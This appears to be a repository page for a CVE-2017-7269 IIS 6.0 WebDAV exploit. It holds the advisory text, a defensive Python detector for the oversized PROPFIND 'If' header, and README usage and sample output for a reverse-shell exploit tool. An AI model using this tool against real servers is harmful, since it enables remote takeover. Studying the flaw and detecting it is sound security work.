CVE-2017-7269 PoC — Microsoft Internet Information Services buffer error vulnerability

Source
Associated Vulnerability
Title: Microsoft Internet Information Services buffer error vulnerability (CVE-2017-7269)
Description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
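As an added defensive check (not part of the PoC or its repository): a small Python filter that flags the request shape named in the description above, a PROPFIND whose `If` header starts with `<http://` and is far longer than any legitimate lock-token list. The 256-byte threshold and the sample requests are constructed assumptions for this example, not captured traffic.

```python
"""Flag PROPFIND requests carrying an oversized If: <http:// header (CVE-2017-7269 pattern)."""
from typing import Dict, Tuple

# Assumed threshold for this example: a legitimate WebDAV If header lists a few
# lock tokens and stays well below this; the overflow needs a far longer value.
MAX_IF_HEADER_LEN = 256


def parse_request(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Return (method, headers) from a raw HTTP request head.

    Header names are lowercased; repeated headers are joined with ", " so a value
    split across several If: lines is still measured as one value.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        key = name.strip().lower()
        headers[key] = (headers[key] + ", " + value.strip()) if key in headers else value.strip()
    return method, headers


def is_cve_2017_7269_pattern(raw: bytes) -> bool:
    """True when the request matches the method/header shape the advisory describes."""
    method, headers = parse_request(raw)
    if method != "PROPFIND":
        return False
    if_value = headers.get("if")
    if if_value is None or not if_value.startswith("<http://"):
        return False
    return len(if_value) > MAX_IF_HEADER_LEN


# Constructed sample requests (not captured traffic).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: example.local\r\n"
          b"If: <http://example.local/docs/> (<opaquelocktoken:abc>)\r\n\r\n")
SUSPECT = (b"PROPFIND / HTTP/1.1\r\nHost: example.local\r\n"
           b"If: <http://example.local/" + b"A" * 1700 + b">\r\n\r\n")
GET_LONG = (b"GET / HTTP/1.1\r\nHost: example.local\r\n"
            b"If: <http://example.local/" + b"A" * 1700 + b">\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT), ("get-long", GET_LONG)):
        print(f"{name}: {'ALERT' if is_cve_2017_7269_pattern(req) else 'ok'}")
```

Only PROPFIND with the oversized `<http://` value is flagged; the same header on a GET, or a normal lock-token list, passes.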
Description
PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.
Readme

# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

## Disclaimer

This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.

## Prerequisites

- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.

## Usage
### Command-Line Arguments

- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Usage Example

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Windows IP Configuration

   Ethernet adapter Local Area Connection:
      Connection-specific DNS Suffix  . : example.local
      IPv4 Address. . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . : 192.168.1.1
```


## Notes

- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.
